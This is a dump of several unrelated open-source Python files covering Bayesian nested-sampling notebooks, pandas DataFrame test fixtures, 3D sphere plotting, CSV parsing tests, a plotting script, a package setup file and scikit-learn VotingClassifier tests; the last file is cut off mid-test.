ims = ax.imshow(model(p.analyser.get_best_fit()['parameters'])(ydata,xdata))
plt.colorbar(ims)
ax = fig.add_subplot(133)
ims = ax.imshow(zdata)
plt.colorbar(ims)
# Residuals
# Residuals: sum the models of all significant modes and subtract from data.
modelAll = np.zeros((nPts, nPts))
for km, mode in enumerate(p.analyser.get_stats()['modes']):
    # Keep only modes with non-negligible local evidence; the -400000
    # cutoff is an ad-hoc threshold tuned to this particular run.
    if np.round(mode['local log-evidence'], 3) > -400000.:
        modelAll = modelAll + model(mode['mean'])(ydata, xdata)
fig = figure(figsize=(20, 10))
ax = fig.add_subplot(131)
ims = ax.imshow(zdata - modelAll)
plt.colorbar(ims)
ax = fig.add_subplot(132)
# FIX: hist's 'normed' kwarg was deprecated and later removed from
# matplotlib; 'density' is the supported equivalent.
ax.hist((zdata - modelAll).ravel(), bins=1000, density=True)
# plt.colorbar(ims)
# In[ ]:
p.analyser.get_stats()
p.analyser.post_file
# # PyMultiNest Learning Tutorial
#
# CCT = Charge Carrier Trapping - This is a test of comparing the Zhou et al 2017 results with a data driven analysis using multinest
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pandas import read_csv
# In[ ]:
import os
if not os.path.exists('chains/'):
os.mkdir('chains')
print(os.path.exists('chains'))
# # PyMultiNest Solver Class
# **Initial Example**
# In[ ]:
#!/usr/bin/env python
from pymultinest.solve import Solver
from numpy import pi, sin
class EggboxProblem(Solver):
    # 'Eggbox' toy problem: uniform prior on [0, 10*pi] per dimension and a
    # strongly multimodal likelihood surface.
    def Prior(self, cube):
        # Map the unit hypercube to [0, 10*pi] in every dimension.
        return cube * 10 * pi
    def LogLikelihood(self, cube):
        # (2 + prod(sin(cube)))**5, returned directly as the log-likelihood.
        chi = (sin(cube)).prod()
        return (2. + chi)**5
solution = EggboxProblem(n_dims = 1)
print(solution)
solution = EggboxProblem(n_dims = 2)
print(solution)
# **My PyMultiNest Test**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def straight_line(cube):
offset = cube[0]
slope = cube[1]
return lambda abscissa: offset + slope * abscissa
def sine_wave(cube):
amp = cube[0]
period = cube[1]
return lambda abscissa: amp*sin(2*pi / period * abscissa)
np.random.seed(0)
param0= 0.1#0.05
param1= 0.1#5*pi
yunc = 0.025
nPts = int(10)
nThPts= int(1e3)
xmin = -0.5*pi
xmax = 0.5*pi
dx = 0.1*(xmax - xmin)
# model = sine_wave
model = straight_line
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.random.uniform(xmin, xmax, nPts)
xdata = sort(xdata)
ydata = model([param0,param1])(xdata)
yerr = np.random.normal(0, yuncs, nPts)
zdata = ydata + yerr
figure(figsize=(20,5))
plot(thdata, model([param0, param1])(thdata))
errorbar(xdata, zdata, yuncs, fmt='o')
# In[ ]:
class ChisqFit(Solver):
    """Least-squares fit of the notebook-global ``model`` to (xdata, zdata)."""
    def Prior(self, cube):
        # Identity transform: uniform prior on [0, 1] for every parameter.
        return cube
    def LogLikelihood(self, cube):
        # BUG FIX 1: a Gaussian log-likelihood is the SUM of the per-point
        # terms -0.5*residual**2, not their product (a product of log terms
        # has no statistical meaning and flips sign with the point count).
        # BUG FIX 2: fit the observed noisy zdata, not the noiseless ydata.
        chisq = (-0.5*((model(cube)(xdata) - zdata)**2.) )#/ yuncs**2.
        return chisq.sum()
# solution = ChisqFit(n_dims = 2, resume=False, outputfiles_basename='./42-')
solution = ChisqFit(n_dims = 2, n_params=None, n_clustering_params=None, wrapped_params=None , importance_nested_sampling=True, multimodal=True, const_efficiency_mode=False , n_live_points=400, evidence_tolerance=0.5, sampling_efficiency=0.8 , n_iter_before_update=100, null_log_evidence=-1e+90, max_modes=100 , mode_tolerance=-1e+90, outputfiles_basename='chains/1-', seed=-1, verbose=False , resume=False, context=0, write_output=True, log_zero=-1e+100, max_iter=0 , init_MPI=False, dump_callback=None)
print(solution)
# **Simplest Example**
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
import pymultinest
def prior(cube, ndim, nparams):
    """In-place prior transform: stretch cube[0] from [0, 1] onto [0, 2]."""
    cube[0] *= 2
def loglikelihood(cube, ndim, nparams):
    # Gaussian log-likelihood centred at 0.2 with sigma 0.1.
    # BUG FIX: must be the NEGATIVE half chi-square so the likelihood peaks
    # at cube[0] == 0.2; the original returned +((x - 0.2) / 0.1)**2, which
    # MultiNest would maximise by running away from the true value.
    return -0.5 * ((cube[0] - 0.2) / 0.1)**2
pymultinest.run(loglikelihood, prior, n_dims=1, max_iter=2)
# # PyMultiNest Solve Function
# In[ ]:
#!/usr/bin/env python
from __future__ import absolute_import, unicode_literals, print_function
import numpy
from numpy import pi, cos
from pymultinest.solve import solve
import os
if not os.path.exists("chains"): os.mkdir("chains")
# probability function, taken from the eggbox problem.
def myprior(cube):
    """Map the unit hypercube onto a uniform prior on [0, 10*pi] per axis."""
    return cube * 10 * pi
def myloglike(cube):
    """Eggbox log-likelihood: (2 + prod_i cos(cube_i / 2)) ** 5."""
    chi = cos(cube / 2.).prod()
    return (2. + chi) ** 5
# In[ ]:
# number of dimensions our problem has
parameters = ["x", "y"]
n_params = len(parameters)
# run MultiNest
result = solve(LogLikelihood=myloglike, Prior=myprior,
n_dims=n_params, outputfiles_basename="chains/3-")
print()
print('evidence: %(logZ).1f +- %(logZerr).1f' % result)
print()
print('parameter values:')
for name, col in zip(parameters, result['samples'].transpose()):
print('%15s : %.3f +- %.3f' % (name, col.mean(), col.std()))
| gpl-3.0 |
toobaz/pandas | pandas/tests/frame/conftest.py | 2 | 10626 | import numpy as np
import pytest
from pandas import DataFrame, NaT, date_range
import pandas.util.testing as tm
@pytest.fixture
def float_frame_with_na():
    """
    30x4 DataFrame of floats with a unique-string index.

    Columns are ['A', 'B', 'C', 'D']; two bands of entries are blanked
    out with NaN to exercise missing-data code paths.
    """
    frame = DataFrame(tm.getSeriesData())
    # Knock out rows 5-10 entirely and the last two columns of rows 15-20
    # (positional-style slicing on the string index -- legacy pandas behaviour).
    frame.loc[5:10] = np.nan
    frame.loc[15:20, -2:] = np.nan
    return frame
@pytest.fixture
def bool_frame_with_na():
    """
    30x4 DataFrame of object-dtype booleans with a unique-string index.

    Columns are ['A', 'B', 'C', 'D']; two bands of entries are replaced
    with NaN (hence the object dtype).
    """
    frame = (DataFrame(tm.getSeriesData()) > 0).astype(object)
    # Same NaN bands as the float fixture: rows 5-10 and the last two
    # columns of rows 15-20.
    frame.loc[5:10] = np.nan
    frame.loc[15:20, -2:] = np.nan
    return frame
@pytest.fixture
def int_frame():
    """
    30x4 DataFrame of integers with a unique-string index.

    Columns are ['A', 'B', 'C', 'D']; the dtype is forced to int64 so the
    fixture is stable across platforms.
    """
    truncated = {key: series.astype(int)
                 for key, series in tm.getSeriesData().items()}
    return DataFrame(truncated, dtype=np.int64)
@pytest.fixture
def datetime_frame():
    """
    30x4 DataFrame of floats indexed by a business-day DatetimeIndex.

    Columns are ['A', 'B', 'C', 'D'].
    """
    return DataFrame(tm.getTimeSeriesData())
@pytest.fixture
def float_string_frame():
    """
    30x5 DataFrame with four float columns plus a constant string column.

    Columns are ['A', 'B', 'C', 'D', 'foo']; 'foo' is 'bar' in every row.
    """
    frame = DataFrame(tm.getSeriesData())
    frame["foo"] = "bar"
    return frame
@pytest.fixture
def mixed_float_frame():
    """
    30x4 DataFrame of floats with a different dtype per column.

    'A' and 'B' are float32, 'C' is float16, and 'D' is float64.
    """
    frame = DataFrame(tm.getSeriesData())
    # Downcast column by column so every float width is represented.
    for col, dtype in [("A", "float32"), ("B", "float32"),
                       ("C", "float16"), ("D", "float64")]:
        frame[col] = frame[col].astype(dtype)
    return frame
@pytest.fixture
def mixed_int_frame():
    """
    30x4 DataFrame of integers with a different dtype per column.

    'A' is int32, 'B' is all-ones uint64, 'C' is uint8, and 'D' is 'C'
    recast to int64 -- 'C' and 'D' deliberately hold the same values.
    """
    frame = DataFrame({key: series.astype(int)
                       for key, series in tm.getSeriesData().items()})
    frame["A"] = frame["A"].astype("int32")
    frame["B"] = np.ones(len(frame["B"]), dtype="uint64")
    frame["C"] = frame["C"].astype("uint8")
    # Intentionally derived from 'C' (the original fixture's doc table shows
    # identical C/D columns), not a typo fix candidate.
    frame["D"] = frame["C"].astype("int64")
    return frame
@pytest.fixture
def mixed_type_frame():
    """
    10-row DataFrame mixing scalar-broadcast and typed-array columns.

    Columns are ['a', 'b', 'c', 'float32', 'int32'] over an integer index.
    """
    columns = {
        "a": 1.0,
        "b": 2,
        "c": "foo",
        "float32": np.array([1.0] * 10, dtype="float32"),
        "int32": np.array([1] * 10, dtype="int32"),
    }
    return DataFrame(columns, index=np.arange(10))
@pytest.fixture
def timezone_frame():
    """
    3-row DataFrame of date ranges: naive, US/Eastern and CET.

    Columns are ['A', 'B', 'C']; the middle row of both tz-aware columns
    is set to NaT.
    """
    frame = DataFrame(
        {
            "A": date_range("20130101", periods=3),
            "B": date_range("20130101", periods=3, tz="US/Eastern"),
            "C": date_range("20130101", periods=3, tz="CET"),
        }
    )
    # Punch NaT into row 1 of the two tz-aware columns only.
    frame.iloc[1, 1] = NaT
    frame.iloc[1, 2] = NaT
    return frame
@pytest.fixture
def uint64_frame():
    """
    3-row DataFrame of uint64 values.

    Column 'A' counts 0..2; column 'B' holds values just above 2**63,
    i.e. beyond the int64 range.
    """
    data = {"A": np.arange(3), "B": [2 ** 63, 2 ** 63 + 5, 2 ** 63 + 10]}
    return DataFrame(data, dtype=np.uint64)
@pytest.fixture
def simple_frame():
    """
    3x3 float DataFrame counting 1..9 row-major.

    Columns are ['one', 'two', 'three']; index is ['a', 'b', 'c'].
    """
    values = np.arange(1.0, 10.0).reshape(3, 3)
    return DataFrame(values,
                     columns=["one", "two", "three"],
                     index=["a", "b", "c"])
@pytest.fixture
def frame_of_index_cols():
    """
    5-row DataFrame whose columns can serve as index keys.

    Columns are ['A', 'B', 'C', 'D', 'E', ('tuple', 'as', 'label')];
    'A' and 'B' each contain duplicates but are unique taken together,
    while the remaining columns are unique ('D', 'E' and the tuple-labelled
    column are random floats).
    """
    data = {
        "A": ["foo", "foo", "foo", "bar", "bar"],
        "B": ["one", "two", "three", "one", "two"],
        "C": ["a", "b", "c", "d", "e"],
        "D": np.random.randn(5),
        "E": np.random.randn(5),
        ("tuple", "as", "label"): np.random.randn(5),
    }
    return DataFrame(data)
| bsd-3-clause |
bcaine/maddux | maddux/plot.py | 1 | 1372 | import numpy as np
def plot_sphere_data(position, radius):
    """Return the (x, y, z) coordinate grids of a sphere surface.

    :param position: Position in (x, y, z) of the sphere center
    :type position: numpy.ndarray
    :param radius: radius of the sphere
    :type radius: int
    :returns: 100x100 (x, y, z) grids suitable for ``plot_surface``
    :rtype: (np.ndarray, np.ndarray, np.ndarray)
    """
    azimuth = np.linspace(0, 2 * np.pi, 100)
    polar = np.linspace(0, np.pi, 100)
    # Standard spherical parameterisation, offset by the center point.
    x = radius * np.outer(np.cos(azimuth), np.sin(polar)) + position[0]
    y = radius * np.outer(np.sin(azimuth), np.sin(polar)) + position[1]
    z = radius * np.outer(np.ones(np.size(azimuth)), np.cos(polar)) + position[2]
    return (x, y, z)
def plot_sphere(position, radius, ax, color='g', linewidth=0):
    """Plot a sphere surface on a 3D axes.

    :param position: Position in (x, y, z) of the sphere center
    :type position: numpy.ndarray
    :param radius: radius of the sphere
    :type radius: int
    :param ax: axes to plot on
    :type ax: matplotlib.axes
    :param color: (Optional) color of the sphere
    :type color: str
    :param linewidth: (Optional) width of the surface gridlines
    :type linewidth: int
    :rtype: matplotlib.axes
    """
    x, y, z = plot_sphere_data(position, radius)
    # Bug fix: `linewidth` was previously ignored (hard-coded to 0), so the
    # parameter had no effect.  Forward the caller's value instead.
    return ax.plot_surface(x, y, z, rstride=4, cstride=4,
                           color=color, linewidth=linewidth)
| mit |
icereval/modular-file-renderer | mfr/ext/tabular/tests/test_panda_tools.py | 2 | 1244 | # -*- coding: utf-8 -*-
import os
from ..libs import panda_tools
HERE = os.path.dirname(os.path.abspath(__file__))
def test_data_from_dateframe():
    # (sic: "dateframe") -- csv_pandas must return rows as a list of dicts.
    with open(os.path.join(HERE, 'fixtures', 'test.csv')) as fp:
        headers, data = panda_tools.csv_pandas(fp)
    assert type(data) == list
    assert type(data[0]) == dict
def test_csv_pandas():
    # Header cells become {'field', 'id', 'name'} dicts and data rows become
    # column-name -> value dicts; the non-ASCII 'à' must round-trip intact.
    with open(os.path.join(HERE, 'fixtures', 'test.csv')) as fp:
        headers, data = panda_tools.csv_pandas(fp)
    assert headers[0] == {'field': 'one', 'id': 'one', 'name': 'one'}
    assert data[0] == {'one': 'à', 'two': 'b', 'three': 'c'}
def test_tsv_pandas():
    # With the default comma delimiter the tab-separated fixture is parsed as
    # a single column whose name still contains the raw tabs.
    with open(os.path.join(HERE, 'fixtures', 'test.tsv')) as fp:
        headers, data = panda_tools.csv_pandas(fp)
    assert headers[0] == {'field': 'one\ttwo\tthree', 'id': 'one\ttwo\tthree', 'name': 'one\ttwo\tthree'}
    assert data[0] == {'one\ttwo\tthree': 'a\tb\tc'}
# def test_dta_pandas():
# with open('mfr_tabular/tests/fixtures/test.dta') as fp:
# headers, data = panda_tools.dta_pandas(fp)
# assert headers[0] == {'field': 'one', 'id': 'one', 'name': 'one'}
# assert data[0] == {'one': 'a', 'two': 'b', 'three': 'c'}
# assert len(data) is 2
# assert len(headers) is 3
| apache-2.0 |
lzamparo/SdA_reduce | plot_scripts/plot_sda_2d.py | 1 | 6051 | """
==========
SdA 2d visualizations
==========
This script selects a stratified sample from a validation set and plots it. The input data resides in .h5 files from a given directory
After first grabbing one file and calculating the indices of points to sample, go through and plot those sampled points for each h5 file.
"""
import numpy as np
import matplotlib as mpl
mpl.use('pdf') # needed so that you can plot in a batch job with no X server (undefined $DISPLAY) problems
import matplotlib.pyplot as plt
from matplotlib import offsetbox
from matplotlib.font_manager import FontProperties
import logging
import sys, os, re
import tables
from optparse import OptionParser
from time import time
sys.path.append('/home/lee/projects/SdA_reduce/utils')
from extract_datasets import extract_labeled_chunkrange
np.random.seed(0)
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s')
# parse commandline arguments
op = OptionParser()
op.add_option("--h5dir",
dest="directory", help="Read data input files from this directory.")
op.add_option("--size",
dest="size", type="int", help="Extract the first size chunks of the data set and labels.")
op.add_option("--sample-size",
dest="samplesize", type="int", help="The max size of the samples")
op.add_option("--output",
dest="outputfile", help="Write the plot to this output file.")
(opts, args) = op.parse_args()
def extract_name(filename, regex):
    """Return the first capture group of ``regex`` matched against the start
    of ``filename`` (raises AttributeError when there is no match)."""
    match = regex.match(filename)
    return match.groups()[0]
#----------------------------------------------------------------------
# Scale and visualize the embedding vectors in 2D
def plot_embedding(X, tile, sizes, title=None):
    """Scatter one model's 2-D embedding into subplot ``tile`` of the
    module-level 2x5 figure ``fig``, coloured by phenotype class.

    Rows of ``X`` are ordered wild-type, then foci, then non-round nuclei;
    ``sizes`` gives the three strata sizes so the rows can be sliced apart
    again.  Returns the subplot axes.
    """
    #x_min, x_max = np.min(X, 0), np.max(X, 0)
    #X = (X - x_min) / (x_max - x_min)
    sub = fig.add_subplot(2, 5, tile)
    # Establish the indices for plotting as slices of the X matrix.
    # Only the foci upper index is needed; the other strata can be sliced
    # directly from the sizes already stored.
    wt_samplesize, foci_samplesize, ab_nuclei_samplesize = sizes
    foci_upper_index = wt_samplesize + foci_samplesize
    # red = wild type, blue = foci, green = non-round nuclei
    sub.plot(X[:wt_samplesize, 0], X[:wt_samplesize, 1], "ro")
    sub.plot(X[wt_samplesize:foci_upper_index, 0], X[wt_samplesize:foci_upper_index, 1], "bo")
    sub.plot(X[foci_upper_index:, 0], X[foci_upper_index:, 1], "go")
    #legend_font_props = FontProperties()
    #legend_font_props.set_size('small')
    #sub.legend( ('Wild Type', 'Foci', 'Non-round Nuclei'), loc="lower left", numpoints=1,prop=legend_font_props)
    if title is not None:
        sub.set_title(title,fontsize=17)
    return sub
# This becomes a subroutine to extract the data from each h5 file in the directory.
def sample_from(file_name, opts, sampling_tuple=None):
    ''' Return the sample from the data, the size of each sample, and a tuple containing the rows sampled for each label. '''
    # Legacy PyTables spelling (openFile); modern PyTables uses open_file.
    datafile = tables.openFile(file_name, mode = "r", title = "Data is stored here")

    # Extract the first opts.size labeled chunks from the datafile.
    X, labels = extract_labeled_chunkrange(datafile, opts.size)

    # Split rows by phenotype label: 0 = wild type, 1 = foci, 2 = ab nuclei.
    wt_labels = np.nonzero(labels[:,0] == 0)[0]
    foci_labels = np.nonzero(labels[:,0] == 1)[0]
    ab_nuclei_labels = np.nonzero(labels[:,0] == 2)[0]

    wt_data = X[wt_labels,:]
    foci_data = X[foci_labels,:]
    ab_nuclei_data = X[ab_nuclei_labels,:]

    # Figure out the sample sizes based on the shape of the *_labels arrays
    # and the --sample-size argument (capped at the stratum size).
    wt_samplesize = min(opts.samplesize,wt_data.shape[0])
    foci_samplesize = min(opts.samplesize,foci_data.shape[0])
    ab_nuclei_samplesize = min(opts.samplesize, ab_nuclei_data.shape[0])
    sizes = (wt_samplesize, foci_samplesize, ab_nuclei_samplesize)

    if sampling_tuple is None:
        # First call: draw one random permutation per stratum; reusing the
        # returned tuple on later calls samples every file at the same rows.
        wt_rows = np.arange(wt_data.shape[0])
        foci_rows = np.arange(foci_data.shape[0])
        ab_nuclei_rows = np.arange(ab_nuclei_data.shape[0])
        np.random.shuffle(wt_rows)
        np.random.shuffle(foci_rows)
        np.random.shuffle(ab_nuclei_rows)
        sampling_tuple = (wt_rows,foci_rows,ab_nuclei_rows)
    else:
        wt_rows,foci_rows,ab_nuclei_rows = sampling_tuple

    # Stack the strata in a fixed order: wild type, foci, then ab nuclei
    # (plot_embedding relies on this ordering).
    wt_data_sample = wt_data[wt_rows[:wt_samplesize],:]
    foci_data_sample = foci_data[foci_rows[:foci_samplesize],:]
    ab_nuclei_sample = ab_nuclei_data[ab_nuclei_rows[:ab_nuclei_samplesize],:]
    D = np.vstack((wt_data_sample,foci_data_sample,ab_nuclei_sample))

    datafile.close()
    return D, sampling_tuple, sizes
# Read all h5 files
os.chdir(opts.directory)
files = [f for f in os.listdir('.') if f.endswith('.h5')]
name_pattern = re.compile('reduce_SdA\.([\d_]+)\.[\d]+')
sampling_tuple = None

# use the top 10 by homogeneity test ranking
top_10 = [open(filename,'r').readlines() for filename in os.listdir('.') if filename.endswith('homog.txt')]
top_10 = [name.strip() for name in top_10[0]]
top_10_files = [f for f in files if extract_name(f, name_pattern) in top_10]

fig = plt.figure(figsize=(20,10),dpi=100)

for tile,f in enumerate(top_10_files):
    # NOTE(review): enumerate starts at 0 but add_subplot's tile argument is
    # 1-based; confirm plot_embedding receives the intended tile numbers.
    data, sampling_tuple, sizes = sample_from(f, opts, sampling_tuple)
    model_name = extract_name(f, name_pattern)
    if model_name in top_10:
        sub = plot_embedding(data, tile, sizes, extract_name(f, name_pattern))

# Put a legend below current axis (attached to the last subplot drawn)
legend_font_props = FontProperties()
legend_font_props.set_size('large')
sub.legend( ('Wild Type', 'Foci', 'Non-round Nuclei'), loc="lower left", numpoints=1,prop=legend_font_props, bbox_to_anchor=(-1.85, -0.20),
            fancybox=True, shadow=True, ncol=3)

# Put a title on the main figure
#fig.suptitle("2D projections of 10 different SdA models",fontsize=20)
fig.subplots_adjust(hspace=0.25)

# Save the figure
fig.savefig(opts.outputfile,format="pdf", orientation='landscape', pad_inches=0)
| bsd-3-clause |
squirrelo/qiita | qiita_plugins/target_gene/setup.py | 1 | 1827 | #!/usr/bin/env python
# -----------------------------------------------------------------------------
# Copyright (c) 2013, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from setuptools import setup
from glob import glob
__version__ = "0.1.0-dev"

# Trove classifiers; parsed into a list below (blank lines dropped).
classes = """
Development Status :: 3 - Alpha
License :: OSI Approved :: BSD License
Topic :: Scientific/Engineering :: Bio-Informatics
Topic :: Software Development :: Libraries :: Application Frameworks
Topic :: Software Development :: Libraries :: Python Modules
Programming Language :: Python
Programming Language :: Python :: 2.7
Programming Language :: Python :: Implementation :: CPython
Operating System :: POSIX :: Linux
Operating System :: MacOS :: MacOS X
"""

# Long description is taken verbatim from the README.
with open('README.rst') as f:
    long_description = f.read()

classifiers = [s.strip() for s in classes.split('\n') if s]

setup(name='qiita-plugin-target-gene',
      version=__version__,
      long_description=long_description,
      license="BSD",
      description='Qiita Plugin: Target Gene',
      author="Qiita development team",
      author_email="qiita.help@gmail.com",
      url='https://github.com/biocore/qiita',
      test_suite='nose.collector',
      packages=['tgp', 'tgp/split_libraries'],
      package_data={'tgp': ['support_files/config_file.cfg']},
      scripts=glob('scripts/*'),
      extras_require={'test': ["nose >= 0.10.1", "pep8", 'httpretty']},
      install_requires=['click >= 3.3', 'future', 'requests', 'pandas >= 0.15',
                        'h5py >= 2.3.1', 'qiime >= 1.9.0, < 1.10.0'],
      classifiers=classifiers
      )
| bsd-3-clause |
amloewi/css-blockmodels | testing_rpy2.py | 1 | 1545 |
# import numpy as np
# import pandas as pd
#
# # base = library('base') -- import packages from R
# from rpy2.robjects.packages import importr as library
# # R.R('x <- 1') AND R.Array('...') etc -- the core interface
# import rpy2.robjects as R
# # Not clear what this does yet, but allows numpy->R easily?
# import rpy2.robjects.numpy2ri
# # Guess if I want to use formulas, I do really need pandas though --
# # rdf = pd2r.convert_to_r_dataframe(pdf)
# import pandas.rpy.common as pd2r
#
#
# def setup_R():
#
# import numpy as np
# import pandas as pd
#
# # base = library('base') -- import packages from R
# from rpy2.robjects.packages import importr as library
# # R.R('x <- 1') AND R.Array('...') etc -- the core interface
# import rpy2.robjects as R
# # Not clear what this does yet, but allows numpy->R easily?
# import rpy2.robjects.numpy2ri
# # Guess if I want to use formulas, I do really need pandas though --
# # rdf = pd2r.convert_to_r_dataframe(pdf)
# import pandas.rpy.common as pd2r
#
#
#
# def to_rdf(df, name):
# converted = pd2r.convert_to_r_dataframe(df)
# R.globalenv[name] = converted
# return converted
from r import *
if __name__ == '__main__':
    # Load the R packages needed for the smoke test; only gam() is actually
    # exercised below.  (Python 2 script: note the print statement.)
    base = library('base')
    stats = library('stats')
    gam = library('gam')
    kernlab = library('kernlab')

    # Fit a trivial y = 2x + 1 GAM through rpy2 and print R's summary.
    x = np.random.randn(100)
    df = pd.DataFrame({'y':2*x+1, 'x':x})
    rdf = dataframe(df, 'rdf')
    xgam = R.r("gam(y ~ x, family=gaussian, data=rdf)")
    print base.summary(xgam)
| mit |
DSLituiev/scikit-learn | sklearn/ensemble/tests/test_voting_classifier.py | 25 | 8160 | """Testing for the boost module (sklearn.ensemble.boost)."""
import numpy as np
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raise_message
from sklearn.exceptions import NotFittedError
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.model_selection import GridSearchCV
from sklearn import datasets
from sklearn.model_selection import cross_val_score
from sklearn.datasets import make_multilabel_classification
from sklearn.svm import SVC
from sklearn.multiclass import OneVsRestClassifier
# Load the iris dataset and randomly permute it
iris = datasets.load_iris()
X, y = iris.data[:, 1:3], iris.target
def test_estimator_init():
    # An empty estimator list must be rejected with a descriptive error.
    eclf = VotingClassifier(estimators=[])
    msg = ('Invalid `estimators` attribute, `estimators` should be'
           ' a list of (string, estimator) tuples')
    assert_raise_message(AttributeError, msg, eclf.fit, X, y)

    # Unknown voting mode must be rejected.
    clf = LogisticRegression(random_state=1)
    eclf = VotingClassifier(estimators=[('lr', clf)], voting='error')
    msg = ('Voting must be \'soft\' or \'hard\'; got (voting=\'error\')')
    assert_raise_message(ValueError, msg, eclf.fit, X, y)

    # Weight count must match the estimator count.
    eclf = VotingClassifier(estimators=[('lr', clf)], weights=[1, 2])
    msg = ('Number of classifiers and weights must be equal'
           '; got 2 weights, 1 estimators')
    assert_raise_message(ValueError, msg, eclf.fit, X, y)
def test_predictproba_hardvoting():
    # predict_proba is only defined for soft voting; hard voting must raise.
    eclf = VotingClassifier(estimators=[('lr1', LogisticRegression()),
                                        ('lr2', LogisticRegression())],
                            voting='hard')
    msg = "predict_proba is not available when voting='hard'"
    assert_raise_message(AttributeError, msg, eclf.predict_proba, X)
def test_notfitted():
    # Calling predict_proba before fit must raise NotFittedError.
    eclf = VotingClassifier(estimators=[('lr1', LogisticRegression()),
                                        ('lr2', LogisticRegression())],
                            voting='soft')
    msg = ("This VotingClassifier instance is not fitted yet. Call \'fit\'"
           " with appropriate arguments before using this method.")
    assert_raise_message(NotFittedError, msg, eclf.predict_proba, X)
def test_majority_label_iris():
    """Check classification by majority label on dataset iris."""
    clf1 = LogisticRegression(random_state=123)
    clf2 = RandomForestClassifier(random_state=123)
    clf3 = GaussianNB()
    eclf = VotingClassifier(estimators=[
        ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
        voting='hard')
    # Hard-voting ensemble is expected to reach ~95% CV accuracy on iris.
    scores = cross_val_score(eclf, X, y, cv=5, scoring='accuracy')
    assert_almost_equal(scores.mean(), 0.95, decimal=2)
def test_tie_situation():
    """Check voting classifier selects smaller class label in tie situation."""
    clf1 = LogisticRegression(random_state=123)
    clf2 = RandomForestClassifier(random_state=123)
    eclf = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2)],
                            voting='hard')
    # The two base estimators disagree on sample 73 (classes 2 vs 1) ...
    assert_equal(clf1.fit(X, y).predict(X)[73], 2)
    assert_equal(clf2.fit(X, y).predict(X)[73], 1)
    # ... and the ensemble must break the 1-1 tie toward the smaller label.
    assert_equal(eclf.fit(X, y).predict(X)[73], 1)
def test_weights_iris():
    """Check classification by average probabilities on dataset iris."""
    clf1 = LogisticRegression(random_state=123)
    clf2 = RandomForestClassifier(random_state=123)
    clf3 = GaussianNB()
    # Soft voting with GaussianNB weighted 10x dominates the averaged
    # probabilities.
    eclf = VotingClassifier(estimators=[
        ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
        voting='soft',
        weights=[1, 2, 10])
    scores = cross_val_score(eclf, X, y, cv=5, scoring='accuracy')
    assert_almost_equal(scores.mean(), 0.93, decimal=2)
def test_predict_on_toy_problem():
    """Manually check predicted class labels for toy dataset."""
    clf1 = LogisticRegression(random_state=123)
    clf2 = RandomForestClassifier(random_state=123)
    clf3 = GaussianNB()

    X = np.array([[-1.1, -1.5],
                  [-1.2, -1.4],
                  [-3.4, -2.2],
                  [1.1, 1.2],
                  [2.1, 1.4],
                  [3.1, 2.3]])

    y = np.array([1, 1, 1, 2, 2, 2])

    # Bug fix: the original compared all(predictions) with all(expected),
    # which reduces both sides to True whenever no element is zero -- the
    # assertion could never fail.  Compare element-wise instead.
    assert_equal(list(clf1.fit(X, y).predict(X)), [1, 1, 1, 2, 2, 2])
    assert_equal(list(clf2.fit(X, y).predict(X)), [1, 1, 1, 2, 2, 2])
    assert_equal(list(clf3.fit(X, y).predict(X)), [1, 1, 1, 2, 2, 2])

    # Hard voting with equal weights.
    eclf = VotingClassifier(estimators=[
        ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
        voting='hard',
        weights=[1, 1, 1])
    assert_equal(list(eclf.fit(X, y).predict(X)), [1, 1, 1, 2, 2, 2])

    # Soft voting with equal weights.
    eclf = VotingClassifier(estimators=[
        ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
        voting='soft',
        weights=[1, 1, 1])
    assert_equal(list(eclf.fit(X, y).predict(X)), [1, 1, 1, 2, 2, 2])
def test_predict_proba_on_toy_problem():
    """Calculate predicted probabilities on toy dataset."""
    clf1 = LogisticRegression(random_state=123)
    clf2 = RandomForestClassifier(random_state=123)
    clf3 = GaussianNB()
    X = np.array([[-1.1, -1.5], [-1.2, -1.4], [-3.4, -2.2], [1.1, 1.2]])
    y = np.array([1, 1, 2, 2])

    # Reference per-estimator probabilities, pinned for the fixed seeds.
    clf1_res = np.array([[0.59790391, 0.40209609],
                         [0.57622162, 0.42377838],
                         [0.50728456, 0.49271544],
                         [0.40241774, 0.59758226]])

    clf2_res = np.array([[0.8, 0.2],
                         [0.8, 0.2],
                         [0.2, 0.8],
                         [0.3, 0.7]])

    clf3_res = np.array([[0.9985082, 0.0014918],
                         [0.99845843, 0.00154157],
                         [0., 1.],
                         [0., 1.]])

    # Expected soft-vote outputs: weighted mean with weights [2, 1, 1].
    t00 = (2*clf1_res[0][0] + clf2_res[0][0] + clf3_res[0][0]) / 4
    t11 = (2*clf1_res[1][1] + clf2_res[1][1] + clf3_res[1][1]) / 4
    t21 = (2*clf1_res[2][1] + clf2_res[2][1] + clf3_res[2][1]) / 4
    t31 = (2*clf1_res[3][1] + clf2_res[3][1] + clf3_res[3][1]) / 4

    eclf = VotingClassifier(estimators=[
        ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
        voting='soft',
        weights=[2, 1, 1])
    eclf_res = eclf.fit(X, y).predict_proba(X)

    assert_almost_equal(t00, eclf_res[0][0], decimal=1)
    assert_almost_equal(t11, eclf_res[1][1], decimal=1)
    assert_almost_equal(t21, eclf_res[2][1], decimal=1)
    assert_almost_equal(t31, eclf_res[3][1], decimal=1)

    # predict_proba must remain unavailable under hard voting.
    try:
        eclf = VotingClassifier(estimators=[
            ('lr', clf1), ('rf', clf2), ('gnb', clf3)],
            voting='hard')
        eclf.fit(X, y).predict_proba(X)
    except AttributeError:
